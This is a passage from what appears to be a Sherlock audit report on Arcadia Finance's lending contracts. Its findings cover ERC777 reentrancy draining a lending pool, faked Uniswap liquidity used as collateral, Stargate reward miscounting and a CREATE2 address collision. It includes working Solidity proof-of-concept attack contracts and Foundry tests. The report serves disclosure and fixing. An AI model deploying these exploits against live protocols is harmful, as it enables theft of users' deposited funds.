        /// - Create an actionTarget contract that will trigger the attack flow using the ERC777 callback when receiving the 
        ///   borrowed funds in the flash action.
        /// - Have some liquidity deposited in the pool in order to be able to borrow it
        /// Attack:
        /// 1. Open a margin account in the creditor to be exploited.
        /// 2. Deposit a small amount of collateral. This amount needs to be big enough to cover the `minUsdValue` configured
        /// in the registry for the given creditor.
        /// 3. Create the `actionData` for the account's `flashAction()` function. The data contained in it (withdrawData, transferFromOwnerData,
        /// permit, signature and actionTargetData) can be empty, given that such data is not required for the attack.
        /// 4. Trigger LendingPool.flashAction(). The execution flow will:
        ///     a. Mint the flash-actioned debt to the account
        ///     b. Send the borrowed funds to the action target
        ///     c. The action target will execute the ERC777 `tokensReceived()` callback, which will:
        ///        - Trigger Liquidator.liquidateAccount(), which will set the account in an auction state
        ///        - Trigger Liquidator.bid(). 
     
        function testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds(
            uint128 amountLoaned,
            uint112 collateralValue,
            uint128 liquidity,
            uint8 originationFee
        ) public {   
    
            //----------            STEP 1            ----------//
            // Open a margin account
            vm.startPrank(users.accountOwner);
            proxyAccount.openMarginAccount(address(pool)); 
            
            //----------            STEP 2            ----------//
            // Deposit 1 stable token in the account as collateral.
            // Note: The creditors's `minUsdValue` is set to 1 * 10 ** 18. Because
            // value is converted to an 18-decimal number and the asset is pegged to 1 dollar,
            // depositing an amount of 1 * 10 ** 6 is the actual minimum usd amount so that the 
            // account's collateral value is not considered as 0.
            depositTokenInAccount(proxyAccount, mockERC20.stable1, 1 * 10 ** 6);
            assertEq(proxyAccount.getCollateralValue(), 1 * 10 ** 18);
    
            //----------            STEP 3            ----------//
            // Create empty action data. The action handler won't withdraw/deposit any asset from the account 
            // when the `flashAction()` callback in the account is triggered. Hence, action data will contain empty elements.
            callData = _buildActionData();
    
            // Fetch balances from the action handler (who will receive all the borrowed funds from the flash action)
            // as well as the pool. 
            // Action handler balance initially has 1 token of token777 (given initially on deployment)
            assertEq(mockERC20.token777.balanceOf(address(actionHandler)), 1 * 10 ** 18);
            uint256 liquidityPoolBalanceBefore =  mockERC20.token777.balanceOf(address(pool));
            uint256 actionHandlerBalanceBefore =  mockERC20.token777.balanceOf(address(actionHandler));
            // Pool initially has 100 tokens of token777 (deposited by the liquidity provider in setUp())
            assertEq(mockERC20.token777.balanceOf(address(pool)), 100 * 10 ** 18);
    
            //----------            STEP 4            ----------//
            // Step 4. Trigger the flash action.
            vm.startPrank(users.accountOwner);
    
            pool.flashAction(100 ether , address(proxyAccount), address(actionHandler), callData, emptyBytes3);
            vm.stopPrank();
     
            
            //----------       FINAL ASSERTIONS       ----------//
    
            // Action handler (who is the receiver of the borrowed funds in the flash action) has succesfully obtained 100 tokens from 
            //the pool, and in the end it has nearly 101 tokens (initially it had 1 token, plus the 100 tokens stolen 
            // from the pool minus the small amount required to pay for the bid)
            assertGt(mockERC20.token777.balanceOf(address(actionHandler)), 100 * 10 ** 18);
    
            // On the other hand, pool has lost nearly all of its balance, only remaining the small amount paid from the 
            // action handler in order to bid
            assertLt(mockERC20.token777.balanceOf(address(pool)), 0.05 * 10 ** 18);
        
        } 
    
        /// @notice Internal function to build the `actionData` payload needed to execute the `flashActionByCreditor()` 
        /// callback when requesting a flash action
        function _buildActionData() internal returns(bytes memory) {
            ActionData memory emptyActionData;
            address[] memory to;
            bytes[] memory data;
            bytes memory actionTargetData = abi.encode(emptyActionData, to, data);
            IPermit2.PermitBatchTransferFrom memory permit;
            bytes memory signature;
            return abi.encode(emptyActionData, emptyActionData, permit, signature, actionTargetData);
        }
    }
    
    /// @notice ERC777Recipient interface
    interface IERC777Recipient {
       
        function tokensReceived(
            address operator,
            address from,
            address to,
            uint256 amount,
            bytes calldata userData,
            bytes calldata operatorData
        ) external;
    }
    
     /// @notice Liquidator interface
    interface ILiquidator {
        function liquidateAccount(address account) external;
        function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external;
    }
    
     /// @notice actionHandler contract that will trigger the attack via ERC777's `tokensReceived()` callback
    contract ActionHandler is IERC777Recipient, IActionBase {
    
        ILiquidator public immutable liquidator;
        address public immutable account;
        uint256 triggered;
    
        constructor(address _liquidator, address _account) {
            liquidator = ILiquidator(_liquidator);
            account = _account;
        }  
    
    		 /// @notice ERC777 callback function
        function tokensReceived(
            address operator,
            address from,
            address to,
            uint256 amount,
            bytes calldata userData,
            bytes calldata operatorData
        ) external {
            // Only trigger the callback once (avoid triggering it while receiving funds in the setup + when receiving final funds)
            if(triggered == 1) {
                triggered = 2;
                liquidator.liquidateAccount(account);
                uint256[] memory askedAssetAmounts = new uint256[](1);
                askedAssetAmounts[0] = 1; // only ask for 1 wei of token so that we repay a small share of the debt
                liquidator.bid(account, askedAssetAmounts, true);
            }
    				unchecked{
    	        triggered++;
    				}
        }
    
        function executeAction(bytes calldata actionTargetData) external returns (ActionData memory) {
            ActionData memory data;
            return data;
        }
    
    }
  6. Execute the proof of concept with the following command (being inside the lending-v2 folder): forge test --mt testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds

Impact

The impact for this vulnerability is high. All funds deposited in creditors with ERC777 tokens as the underlying asset can be drained.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/lending-v2/src/LendingPool.sol#L567

Tool used

Manual Review, foundry

Recommendation

This attack is possible because the getCollateralValue() function returns a 0 collateral value due to the minUsdValue mentioned before not being reached after executing the bid. The Liquidator’s _settleAuction() function then believes the collateral held in the account is 0.

In order to mitigate the issue, consider fetching the actual real collateral value inside _settleAuction() even if it is less than the minUsdValue held in the account, so that the function can properly check if the full collateral was sold or not.

// Liquidator.sol
function _settleAuction(address account, AuctionInformation storage auctionInformation_)
        internal
        returns (bool success)
    {
        ...

        uint256 collateralValue = IAccount(account).getCollateralValue(); // <----- Fetch the REAL collateral value instead of reducing it to 0 if `minUsdValue` is not reached
        
 
        ...
    }

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: high(2)

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/lending-v2#133.

Thomas-Smets

Fix consists out of two PR's:

IAm0x52

Fix looks good. By triggering the transfer inside the callback, the account is now locked nonreentrant which prevents liquidation calls.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue H-3: Caching Uniswap position liquidity allows borrowing using undercollateralized Uni positions

Source: #154

Found by

0xadrii, zzykxx

Summary

It is possible to fake the amount of liquidity held in a Uniswap V3 position, making the protocol believe the Uniswap position has more liquidity than the actual liquidity deposited in the position. This makes it possible to borrow using undercollateralized Uniswap positions.

Vulnerability Detail

When depositing into an account, the deposit() function is called, which calls the internal _deposit() function. Depositing is performed in two steps:

  1. The registry’s batchProcessDeposit() function is called. This function checks if the deposited assets can be priced, and in case that a creditor is set, it also updates the exposures and underlying assets for the creditor.
  2. The assets are transferred and deposited into the account.
// AccountV1.sol

function _deposit(
        address[] memory assetAddresses,
        uint256[] memory assetIds,
        uint256[] memory assetAmounts,
        address from
    ) internal {
        // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.
        // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.
        uint256[] memory assetTypes =
            IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);

        for (uint256 i; i < assetAddresses.length; ++i) {
            // Skip if amount is 0 to prevent storing addresses that have 0 balance.
            if (assetAmounts[i] == 0) continue;

            if (assetTypes[i] == 0) {
                if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();
                _depositERC20(from, assetAddresses[i], assetAmounts[i]);
            } else if (assetTypes[i] == 1) {
                if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();
                _depositERC721(from, assetAddresses[i], assetIds[i]);
            } else if (assetTypes[i] == 2) {
                _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);
            } else {
                revert AccountErrors.UnknownAssetType();
            }
        }

        if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {
            revert AccountErrors.TooManyAssets();
        }
    }

For Uniswap positions (and assuming that a creditor is set), calling batchProcessDeposit() will internally trigger the UniswapV3AM.processDirectDeposit():

// UniswapV3AM.sol

function processDirectDeposit(address creditor, address asset, uint256 assetId, uint256 amount)
        public
        override
        returns (uint256 recursiveCalls, uint256 assetType)
    {
        // Amount deposited of a Uniswap V3 LP can be either 0 or 1 (checked in the Account).
        // For uniswap V3 every id is a unique asset -> on every deposit the asset must added to the Asset Module.
        if (amount == 1) _addAsset(assetId);

        ...
    }

The Uniswap position will then be added to the protocol using the internal _addAsset() function. One of the most important actions performed inside this function is to store the liquidity that the Uniswap position has in that moment. Such liquidity is obtained from directly querying the NonfungiblePositionManager contract:

function _addAsset(uint256 assetId) internal {
        ...

        (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);

        // No need to explicitly check if token0 and token1 are allowed, _addAsset() is only called in the
        // deposit functions and there any deposit of non-allowed Underlying Assets will revert.
        if (liquidity == 0) revert ZeroLiquidity();

        // The liquidity of the Liquidity Position is stored in the Asset Module,
        // not fetched from the NonfungiblePositionManager.
        // Since liquidity of a position can be increased by a non-owner,
        // the max exposure checks could otherwise be circumvented.
        assetToLiquidity[assetId] = liquidity;

        ...
    }

As the snippet shows, the liquidity is stored in a mapping because “Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.”. From this point forward, and until the Uniswap position is withdrawn from the account, the collateral value (i.e the amount that the position is worth) will be computed utilizing the _getPosition() internal function, which will read the cached liquidity value stored in the assetToLiquidity[assetId] mapping, rather than directly consulting the NonFungibleManager contract. This way, the position won’t be able to surpass the max exposures:

// UniswapV3AM.sol

function _getPosition(uint256 assetId)
        internal
        view
        returns (address token0, address token1, int24 tickLower, int24 tickUpper, uint128 liquidity)
    {
        // For deposited assets, the liquidity of the Liquidity Position is stored in the Asset Module,
        // not fetched from the NonfungiblePositionManager.
        // Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.
        liquidity = uint128(assetToLiquidity[assetId]);

        if (liquidity > 0) {
            (,, token0, token1,, tickLower, tickUpper,,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);
        } else {
            // Only used as an off-chain view function by getValue() to return the value of a non deposited Liquidity Position.
            (,, token0, token1,, tickLower, tickUpper, liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);
        }
    }

However, storing the liquidity leads to an attack vector that allows Uniswap positions’ liquidity to be comlpetely withdrawn while making the protocol believe that the Uniswap position is still full.

As mentioned in the beginning of the report, the deposit process is done in two steps: processing assets in the registry and transferring the actual assets to the account. Because processing assets in the registry is the step where the Uniswap position’s liquidity is cached, a malicious depositor can use an ERC777 hook in the transferring process to withdraw the liquidity in the Uniswap position.

The following steps show how the attack could be performed:

  1. Initially, a malicious contract must be created. This contract will be the one holding the assets and depositing them into the account, and will also be able to trigger the ERC777’s tokensToSend() hook.
  2. The malicious contract will call the account’s deposit() function with two assetAddresses to be deposited: the first asset must be an ERC777 token, and the second asset must be the Uniswap position.
  3. IRegistry(registry).batchProcessDeposit() will then execute. This is the first of the two steps taking place to deposit assets, where the liquidity from the Uniswap position will be fetched from the NonFungiblePositionManager and stored in the assetToLiquidity[assetId] mapping.
  4. After processing the assets, the transferring phase will start. The first asset to be transferred will be the ERC777 token. This will trigger the tokensToSend() hook in our malicious contract. At this point, our contract is still the owner of the Uniswap position (the Uniswap position won’t be transferred until the ERC777 transfer finishes), so the liquidity in the Uniswap position can be decreased inside the hook triggered in the malicious contract. This leaves the Uniswap position with a smaller liquidity amount than the one stored in the batchProcessDeposit() step, making the protocol believe that the liquidity stored in the position is the one that the position had prior to starting the attack.
  5. Finally, and following the transfer of the ERC777 token, the Uniswap position will be transferred and succesfully deposited in the account. Arcadia will believe that the account has a Uniswap position worth some liquidity, when in reality the Uni position will be empty.

Proof of Concept

This proof of concept show show the previous attack can be performed so that the liquidity in the uniswap position is 0, while the collateral value for the account is far greater than 0.

  1. Create a ERC777Mock.sol file in lib/accounts-v2/test/utils/mocks/tokens and paste the code found in this github gist.

  2. Import the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in lib/accounts-v2/test/utils/Types.sol to add an additional token777ToUsd, token777 of type ERC777Mock and token777ToUsd rate:

    import "../utils/mocks/tokens/ERC777Mock.sol"; // <----- Import this
    
    ...
    
    struct MockOracles {
        ArcadiaOracle stable1ToUsd;
        ArcadiaOracle stable2ToUsd;
        ArcadiaOracle token1ToUsd;
        ArcadiaOracle token2ToUsd;
        ArcadiaOracle token3ToToken4;
        ArcadiaOracle token4ToUsd;
        ArcadiaOracle token777ToUsd; // <----- Add this
        ArcadiaOracle nft1ToToken1;
        ArcadiaOracle nft2ToUsd;
        ArcadiaOracle nft3ToToken1;
        ArcadiaOracle sft1ToToken1;
        ArcadiaOracle sft2ToUsd;
    }
    
    struct MockERC20 {
        ERC20Mock stable1;
        ERC20Mock stable2;
        ERC20Mock token1;
        ERC20Mock token2;
        ERC20Mock token3;
        ERC20Mock token4;
        ERC777Mock token777; // <----- Add this
    }
    
    ...
    
    struct Rates {
        uint256 stable1ToUsd;
        uint256 stable2ToUsd;
        uint256 token1ToUsd;
        uint256 token2ToUsd;
        uint256 token3ToToken4;
        uint256 token4ToUsd;
        uint256 token777ToUsd; // <----- Add this
        uint256 nft1ToToken1;
        uint256 nft2ToUsd;
        uint256 nft3ToToken1;
        uint256 sft1ToToken1;
        uint256 sft2ToUsd;
    }
  3. Replace the contents inside lib/accounts-v2/test/fuzz/Fuzz.t.sol for the code found in this github gist.

  4. Next step is to replace the file found in lending-v2/test/fuzz/Fuzz.t.sol for the code found in this github gist.

  5. Create a PocUniswap.t.sol file in lending-v2/test/fuzz/LendingPool/PocUniswap.t.sol and paste the following code snippet into it:

    /**
     * Created by Pragma Labs
     * SPDX-License-Identifier: BUSL-1.1
     */
    pragma solidity 0.8.22;
    
    import { LendingPool_Fuzz_Test } from "./_LendingPool.fuzz.t.sol";
    
    import { IPermit2 } from "../../../lib/accounts-v2/src/interfaces/IPermit2.sol";
    import { UniswapV3AM_Fuzz_Test, UniswapV3Fixture, UniswapV3AM, IUniswapV3PoolExtension, TickMath } from "../../../lib/accounts-v2/test/fuzz/asset-modules/UniswapV3AM/_UniswapV3AM.fuzz.t.sol";
    import { ERC20Mock } from "../../../lib/accounts-v2/test/utils/mocks/tokens/ERC20Mock.sol";
    
    import "forge-std/console.sol";
    
    interface IERC721 {
        function ownerOf(uint256 tokenid) external returns(address);
        function approve(address spender, uint256 tokenId) external;
    }
     
    /// @notice Proof of Concept - Arcadia
    contract Poc is LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test { 
    
        /////////////////////////////////////////////////////////////////
        //                         CONSTANTS                           //
        /////////////////////////////////////////////////////////////////
        int24 private MIN_TICK = -887_272;
        int24 private MAX_TICK = -MIN_TICK;
    
        /////////////////////////////////////////////////////////////////
        //                          STORAGE                            //
        /////////////////////////////////////////////////////////////////
        AccountOwner public accountOwnerContract;
        ERC20Mock token0;
        ERC20Mock token1;
        uint256 tokenId;
    
        /////////////////////////////////////////////////////////////////
        //                          SETUP                              //
        /////////////////////////////////////////////////////////////////
    
        function setUp() public override(LendingPool_Fuzz_Test, UniswapV3AM_Fuzz_Test) {
            // Setup pool test
            LendingPool_Fuzz_Test.setUp();
    
            // Deploy fixture for Uniswap.
            UniswapV3Fixture.setUp();
    
            deployUniswapV3AM(address(nonfungiblePositionManager));
    
            vm.startPrank(users.riskManager);
            registryExtension.setRiskParametersOfDerivedAM(
                address(pool), address(uniV3AssetModule), type(uint112).max, 100
            );
     
            token0 = mockERC20.token1;
            token1 = mockERC20.token2;
            (token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);
    
            // Deploy account owner
            accountOwnerContract = new AccountOwner(address(nonfungiblePositionManager));
    
            
            // Set origination fee
            vm.startPrank(users.creatorAddress);
            pool.setOriginationFee(100); // 1%
    
            // Transfer ownership to Account Owner 
            vm.startPrank(users.accountOwner);
            factory.safeTransferFrom(users.accountOwner, address(accountOwnerContract), address(proxyAccount));
            vm.stopPrank();
            
    
            // Mint uniswap position underlying tokens to accountOwnerContract
            mockERC20.token1.mint(address(accountOwnerContract), 100 ether);
            mockERC20.token2.mint(address(accountOwnerContract), 100 ether);
    
            // Open Uniswap position 
            tokenId = _openUniswapPosition();
     
    
            // Transfer some ERC777 tokens to accountOwnerContract. These will be used to be deposited as collateral into the account
             vm.startPrank(users.liquidityProvider);
             mockERC20.token777.transfer(address(accountOwnerContract), 1 ether);
        }
    
        /////////////////////////////////////////////////////////////////
        //                           POC                               //
        /////////////////////////////////////////////////////////////////
        /// @notice Test exploiting the reentrancy vulnerability. 
        function testVuln_borrowUsingUndercollateralizedUniswapPosition(
            uint128 amountLoaned,
            uint112 collateralValue,
            uint128 liquidity,
            uint8 originationFee
        ) public {   
    
            //----------            STEP 1            ----------//
            // Open margin account setting pool as new creditor
            vm.startPrank(address(accountOwnerContract));
            proxyAccount.openMarginAccount(address(pool)); 
            
            //----------            STEP 2            ----------//
            // Deposit assets into account. The order of the assets to be deposited is important. The first asset will be an ERC777 token that triggers the callback on transferring.
            // The second asset will be the uniswap position.
    
            address[] memory assetAddresses = new address[](2);
            assetAddresses[0] = address(mockERC20.token777);
            assetAddresses[1] = address(nonfungiblePositionManager);
            uint256[] memory assetIds = new uint256[](2);
            assetIds[0] = 0;
            assetIds[1] = tokenId;
            uint256[] memory assetAmounts = new uint256[](2);
            assetAmounts[0] = 1; // no need to send more than 1 wei as the ERC777 only serves to trigger the callback
            assetAmounts[1] = 1;
            // Set approvals
            IERC721(address(nonfungiblePositionManager)).approve(address(proxyAccount), tokenId);
            mockERC20.token777.approve(address(proxyAccount), type(uint256).max);
    
            // Perform deposit. 
            // Deposit will perform two steps:
            // 1. processDeposit(): this step will handle the deposited assets and verify everything is correct. For uniswap positions, the liquidity in the position
            // will be stored in the `assetToLiquidity` mapping.
            // 2.Transferring the assets: after processing the assets, the actual asset transfers will take place. First, the ER777 colallateral will be transferred. 
            // This will trigger the callback in the accountOwnerContract (the account owner), which will withdraw all the uniswap position liquidity. Because the uniswap 
            // position liquidity has been cached in step 1 (processDeposit()), the protocol will still believe that the uniswap position has some liquidity, when in reality
            // all the liquidity from the position has been withdrawn in the ERC777 `tokensToSend()` callback. 
            proxyAccount.deposit(assetAddresses, assetIds, assetAmounts);
    
            //----------       FINAL ASSERTIONS       ----------//
            // Collateral value fetches the `assetToLiquidity` value cached prior to removing position liquidity. This does not reflect that the position is empty,
            // hence it is possible to borrow with an empty uniswap position.
            uint256 finalCollateralValue = proxyAccount.getCollateralValue();
    
            // Liquidity in the position is 0.
            (
                ,
                ,
                ,
                ,
                ,
                ,
                ,
                uint128 liquidity,
                ,
                ,
                ,
            ) = nonfungiblePositionManager.positions(tokenId); 
    
            console.log("Collateral value of account:", finalCollateralValue);
            console.log("Actual liquidity in position", liquidity);
    
            assertEq(liquidity, 0);
            assertGt(finalCollateralValue, 1000 ether); // Collateral value is greater than 1000
        } 
    
        function _openUniswapPosition() internal returns(uint256 tokenId) {
            vm.startPrank(address(accountOwnerContract));
           
            uint160 sqrtPriceX96 = uint160(
                calculateAndValidateRangeTickCurrent(
                    10 * 10**18, // priceToken0
                    20 * 10**18 // priceToken1
                )
            );
    
            // Create Uniswap V3 pool initiated at tickCurrent with cardinality 300.
            IUniswapV3PoolExtension uniswapPool = createPool(token0, token1, TickMath.getSqrtRatioAtTick(TickMath.getTickAtSqrtRatio(sqrtPriceX96)), 300);
    
            // Approve liquidity
            mockERC20.token1.approve(address(uniswapPool), type(uint256).max);
            mockERC20.token2.approve(address(uniswapPool), type(uint256).max);
    
            // Mint liquidity position.
            uint128 liquidity = 100 * 10**18;
            tokenId = addLiquidity(uniswapPool, liquidity, address(accountOwnerContract), MIN_TICK, MAX_TICK, false);
     
            assertEq(IERC721(address(nonfungiblePositionManager)).ownerOf(tokenId), address(accountOwnerContract));
        }
     
    }
    
    /// @notice ERC777Sender interface
    interface IERC777Sender {
        /**
         * @dev Called by an {IERC777} token contract whenever a registered holder's
         * (`from`) tokens are about to be moved or destroyed. The type of operation
         * is conveyed by `to` being the zero address or not.
         *
         * This call occurs _before_ the token contract's state is updated, so
         * {IERC777-balanceOf}, etc., can be used to query the pre-operation state.
         *
         * This function may revert to prevent the operation from being executed.
         */
        function tokensToSend(
            address operator,
            address from,
            address to,
            uint256 amount,
            bytes calldata userData,
            bytes calldata operatorData
        ) external;
    }
    
    interface INonfungiblePositionManager {
         function positions(uint256 tokenId)
            external
            view
            returns (
                uint96 nonce,
                address operator,
                address token0,
                address token1,
                uint24 fee,
                int24 tickLower,
                int24 tickUpper,
                uint128 liquidity,
                uint256 feeGrowthInside0LastX128,
                uint256 feeGrowthInside1LastX128,
                uint128 tokensOwed0,
                uint128 tokensOwed1
            );
    
        struct DecreaseLiquidityParams {
            uint256 tokenId;
            uint128 liquidity;
            uint256 amount0Min;
            uint256 amount1Min;
            uint256 deadline;
        }
        function decreaseLiquidity(DecreaseLiquidityParams calldata params)
            external
            payable
            returns (uint256 amount0, uint256 amount1);
    }
    
     /// @notice AccountOwner contract that will trigger the attack via ERC777's `tokensToSend()` callback
    contract AccountOwner is IERC777Sender  {
    
            INonfungiblePositionManager public nonfungiblePositionManager;
    
            constructor(address _nonfungiblePositionManager) {
                nonfungiblePositionManager = INonfungiblePositionManager(_nonfungiblePositionManager);
            }
    
         function tokensToSend(
            address operator,
            address from,
            address to,
            uint256 amount,
            bytes calldata userData,
            bytes calldata operatorData
        ) external {
            // Remove liquidity from Uniswap position
           (
                ,
                ,
                ,
                ,
                ,
                ,
                 ,
                uint128 liquidity,
                ,
                ,
                ,
            ) = nonfungiblePositionManager.positions(1); // tokenId 1
    
            INonfungiblePositionManager.DecreaseLiquidityParams memory params = INonfungiblePositionManager.DecreaseLiquidityParams({
                tokenId: 1,
                liquidity: liquidity,
                amount0Min: 0,
                amount1Min: 0,
                deadline: block.timestamp
            });
            nonfungiblePositionManager.decreaseLiquidity(params);
        }
      
    
        function onERC721Received(address, address, uint256, bytes calldata) public pure returns (bytes4) {
            return bytes4(abi.encodeWithSignature("onERC721Received(address,address,uint256,bytes)"));
        }
    
    }
  6. Execute the following command being inside the lending-v2 folder: forge test --mt testVuln_borrowUsingUndercollateralizedUniswapPosition -vvvvv.

NOTE: It is possible that you find issues related to code not being found. This is because the Uniswap V3 deployment uses foundry’s vm.getCode() and we are importing the deployment file from the accounts-v2 repo to the lending-v2 repo, which makes foundry throw some errors. To fix this, just compile the contracts in the accounts-v2 repo and copy the missing folders from the accounts-v2/out generated folder into the lending-v2/out folder.

Impact

High. The protocol will always believe that there is liquidity deposited in the Uniswap position while in reality the position is empty. This allows for undercollateralized borrows, essentially enabling the protocol to be drained if the attack is performed utilizing several uniswap positions.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/UniswapV3/UniswapV3AM.sol#L107

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol#L844

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol#L855

Tool used

Manual Review

Recommendation

There are several ways to mitigate this issue. One possible option is to perform the transfer of assets when depositing at the same time that the asset is processed, instead of first processing the assets (and storing the Uniswap liquidity) and then transferring them. Another option is to perform a liquidity check after depositing the Uniswap position, ensuring that the liquidity stored in the assetToLiquidity[assetId] mapping and the one returned by the NonFungiblePositionManager are the same.

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: high(2)

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/accounts-v2#174.

IAm0x52

Fix looks good. AccountV1.sol will now transfer all assets prior to valuing them.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-1: Stargate STG rewards are accounted incorrectly by StakedStargateAM.sol

Source: #38

Found by

0xVolodya, 0xrice.cooker, AuditorPraise, FCSE507, Hajime, Tricko, ast3ros, cu5t0mPe0, deth, ge6a, infect3d, mstpr-brainbot, pash0k, pkqs90, rvierdiiev, zzykxx

Summary

Stargate LP_STAKING_TIME contract clears and sends rewards to the caller every time deposit() is called but StakedStargateAM does not take it into account.

Vulnerability Detail

When either mint() or increaseLiquidity() are called the assetState[asset].lastRewardGlobal variable is not reset to 0 even though the rewards have been transferred and accounted for on stargate side.

After a call to mint() or increaseLiquidity() any subsequent call to either mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf(), which all internally call _getRewardBalances(), will either revert for underflow or account for less rewards than it should because assetState_.lastRewardGlobal has not been correctly reset to 0 but currentRewardGlobal (which is fetched from stargate) has:

uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌
function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
    currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
}

POC

To copy-paste in USDbCPool.fork.t.sol:

function testFork_WrongRewards() public {
    uint256 initBalance = 1000 * 10 ** USDbC.decimals();
    // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.
    vm.startPrank(users.accountOwner);
    deal(address(USDbC), users.accountOwner, initBalance);

    USDbC.approve(address(router), initBalance);
    router.addLiquidity(poolId, initBalance, users.accountOwner);
    // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);

    // And : The user stakes the LP token via the StargateAssetModule
    uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);
    ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);
    uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);

    //We let 10 days pass to accumulate rewards.
    vm.warp(block.timestamp + 10 days);

    // User increases liquidity of the position.
    uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);
    stakedStargateAM.increaseLiquidity(tokenId, 1);

    vm.expectRevert();
    stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow

    //We let 10 days pass, this accumulates enough rewards for the call to burn to succeed
    vm.warp(block.timestamp + 10 days);
    uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);
    stakedStargateAM.burn(tokenId);

    assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.
    vm.stopPrank();
}

Impact

Users will not be able to take any action on their positions until currentRewardGlobal is greater or equal to assetState_.lastRewardGlobal. After that they will be able to perform actions but their position will account for less rewards than it should because a total amount of assetState_.lastRewardGlobal rewards is nullified.

This will also DOS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral because rewardOf(), which is called to estimate the collateral value, also reverts.

Code Snippet

Tool used

Manual Review

Recommendation

Adjust the assetState[asset].lastRewardGlobal correctly or since every action (mint(), burn(), increaseLiquidity(), decreaseliquidity(), claimReward()) will have the effect of withdrawing all the current rewards it's possible to change the function _getRewardBalances() to use the amount returned by _getCurrentReward() as the deltaReward directly:

uint256 deltaReward = _getCurrentReward(positionState_.asset);

Discussion

sherlock-admin2

1 comment(s) were left on this issue during the judging contest.

takarez commented:

valid: high(1)

Thomas-Smets

Duplicate from #18

sherlock-admin

The protocol team fixed this issue in PR/commit arcadia-finance/accounts-v2#170.

IAm0x52

Fix looks good. Since rewards are claimed on all withdrawals and deposits, reward per token can be calculated directly.

sherlock-admin4

The Lead Senior Watson signed off on the fix.

Issue M-2: CREATE2 address collision against an Account will allow complete draining of lending pools

Source: #59

Found by

PUSH0

Summary

The factory function createAccount() creates a new account contract for the user using CREATE2. We show that a meet-in-the-middle attack at finding an address collision against an undeployed account is possible. Furthermore, such an attack allows draining of all funds from the lending pool.

Vulnerability Detail

The attack consists of two parts: Finding a collision, and actually draining the lending pool. We describe both here:

PoC: Finding a collision

Note that in createAccount, CREATE2 salt is user-supplied, and tx.origin is technically also user-supplied:

account = address(
    new Proxy{ salt: keccak256(abi.encodePacked(salt, tx.origin)) }(
        versionInformation[accountVersion].implementation
    )
);

The address collision an attacker will need to find are:

  • One undeployed Arcadia account address (1).
  • Arbitrary attacker-controlled wallet contract (2).

Both sets of addresses can be brute-force searched because:

  • As shown above, salt is a user-supplied parameter. By brute-forcing many salt values, we have obtained many different (undeployed) wallet accounts for (1).
  • (2) can be searched the same way. The contract just has to be deployed using CREATE2, and the salt is in the attacker's control by definition.

An attacker can find any single address collision between (1) and (2) with high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:

  • Brute-force a sufficient number of values of salt ($2^{80}$), pre-compute the resulting account addresses, and efficiently store them e.g. in a Bloom filter data structure.
  • Brute-force contract pre-computation to find a collision with any address within the stored set in step 1.

The feasibility, as well as detailed technique and hardware requirements of finding a collision, are sufficiently described in multiple references:

  • 1: A past issue on Sherlock describing this attack.
  • 2: EIP-3607, which rationale is this exact attack. The EIP is in final state.
  • 3: A blog post discussing the cost (money and time) of this exact attack.

The hashrate of the BTC network has reached $6 \times 10^{20}$ hashes per second as of time of writing, taking only just $33$ minutes to achieve $2^{80}$ hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.

PoC: Draining the lending pool

Even given EIP-3607 which disables an EOA if a contract is already deployed on top, we show that it's still possible to drain the lending pool entirely given a contract collision.

Assuming the attacker has already found an address collision against an undeployed account, let's say 0xCOLLIDED. The steps for complete draining of a lending pool are as follow:

First tx:

The attacker now has complete control of any funds sent to 0xCOLLIDED.

Second tx:

  • Deploy an account to 0xCOLLIDED.
  • Deposit an asset, collateralize it, then drain the collateral using the allowance set in tx1.
